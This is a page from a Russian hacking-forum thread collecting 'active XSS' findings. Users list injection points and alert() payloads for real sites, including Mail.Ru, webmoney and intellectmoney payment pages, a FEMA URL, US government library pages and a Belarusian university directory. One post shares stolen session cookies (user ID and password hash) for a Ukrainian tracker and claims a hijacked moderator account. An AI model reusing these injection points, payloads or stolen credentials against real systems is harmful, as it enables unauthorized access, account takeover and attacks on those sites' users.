HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 44 из 54 « Первая < 34 40 41 42 43 44 45 46 47 48 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #431  
Старый 15.01.2011, 02:11
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию
Активная XSS на Mail.Ru в теле письма.

/readmsg_translate?id=

[QUOTE="None"]

" background='javascript:alert("opera")'>
" style="width:1000px; height:1000px;" onmouseover='alert("firefox")'>

" background='javascript:alert("opera")'>
" style="width:1000px; height:1000px;" onmouseover='alert("firefox")'>
 
Ответить с цитированием

  #432  
Старый 21.01.2011, 20:51
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию
intellectmoney.ru

платежная система которая стоит вконтакте.

ТИЦ: 160

PR: 3

Бага находится по адресу:

https://intellectmoney.ru/ru/enter/user_paycards/index.php

в названии карты ставим любой html код, фильтрация отсутствует

к примеру можно выполнить alert()
 
Ответить с цитированием

  #433  
Старый 28.01.2011, 13:53
shureg
Guest
Сообщений: n/a
Провел на форуме:
289

Репутация: 2
По умолчанию
XSS у webmoney!

активная XXS уязвимость на сайте: merchant.webmoney.ru

итак по порядку!

1. https://merchant.webmoney.ru нужно авторизовать WMID

2. перейти по ссылке: Настройки (https://merchant.webmoney.ru/conf/purses.asp)

3. выбрать произвольный кошелек и кликнуть по ссылке: настроить (ссылка вида: https://merchant.webmoney.ru/conf/purse.asp?p=ВАШ_КОШЕЛЕК)

4. в поля: Result URL, Success URL, Fail URL, вписать: (">alert())

5. сохранить

---------------------------------------------------

Администрации об этой сообшике сообщенно! возможно скоро прекратит свое существование

------------ UPD---------------------------------

админы вэбмани ответили, что это так и задумывалось =)))) пользуемся наздоровье
 
Ответить с цитированием

  #434  
Старый 08.05.2011, 17:41
ToozPick
Guest
Сообщений: n/a
Провел на форуме:
1956

Репутация: 0
По умолчанию
Крупный треккер Украины. Тиц 100,Я Rank 3/6,PR 5.

http://pslan.kiev.ua/downloadit.php?...3Et00z%3C/i%3E

Уязвим параметр name.Для просмотра нужна регистрация.

Чтоб не регится,можем юзать уже краденые печеньки :

Код:
Code:
uid=403942
pass=672b01c07e1347405b5dd9127aecee24
~

Акк модератора уже в наличии
 
Ответить с цитированием

  #435  
Старый 28.06.2011, 02:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
27217

Репутация: 14
По умолчанию
Pentagon Library

http://www.whs.mil/library/dir.html

POST запросом в поле "Area Code"

">alert(/xss/)

U.S. Government Printing Office

тута уже get

уязвимо два параметра

http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=alert(/xss/)&docid=">alert(/xss/)
 
Ответить с цитированием

  #436  
Старый 13.07.2011, 08:19
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию
сайт- http://victorov.su/md5/

шифруем наш код в md5: ">alert();
 
Ответить с цитированием

  #437  
Старый 24.07.2011, 16:30
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию
Код:
Code:
http://www.fema.gov/library/viewRecord.do?id=%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
Google PR - 9

тИЦ - 180
 
Ответить с цитированием

  #438  
Старый 13.08.2011, 22:26
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию
http://www.salajeanul.ro/index.php?cmd=article

Отсутствует фильтрация входных данных в полях формы комментирования

Уязвимые поля

Цитата:
Сообщение от None  
Nume - alert(/xs/)
Subject - alert(/xs/)
Subiect: - alert(/xs/)
Comentariu: - alert(/xs/)
 
Ответить с цитированием

  #439  
Старый 19.08.2011, 23:43
Unknown
Guest
Сообщений: n/a
Провел на форуме:
27217

Репутация: 14
По умолчанию
БГУ (Минск)

http://phone.bsu.by/

Уязвимые поля:

"ФИО" - ">alert(/1/)

"Подразделение" - ">alert(/1/)
 
Ответить с цитированием

  #440  
Старый 15.09.2011, 19:17
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Active XSS

http://www.ayda.ru/

Требуется регистрация.

если лень делать временное мыло, то

http://www.ayda.ru/stories/write_story.php

Добавляем историю и не надо подтверждать регу.

профиль http://www.ayda.ru/my/profile.php

Уязвимое поле:

* Имя: Vladconsole.log("asd")
 
Ответить с цитированием
Ответ
Страница 44 из 54 « Первая < 34 40 41 42 43 44 45 46 47 48 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ